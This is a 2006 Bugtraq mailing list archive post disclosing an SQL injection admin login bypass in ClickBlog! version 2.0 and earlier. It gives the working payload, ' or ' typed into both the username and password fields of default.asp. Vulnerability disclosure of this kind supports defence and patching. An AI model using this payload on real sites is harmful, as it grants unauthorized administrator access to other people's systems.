Bugtraq: ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection

From: ajannhwt () hotmail com
Date: 14 Sep 2006 20:02:42 -0000

ENGLISH

# Title  :  ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection

# Author :   ajann

# Exploit;

//Before join login page
http://[target]/[path]/default.asp

Username : ' or '
Password : ' or ' and Login Ok

# ajann,Turkey

By Date By Thread

Current thread:

ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection ajannhwt (Sep 15)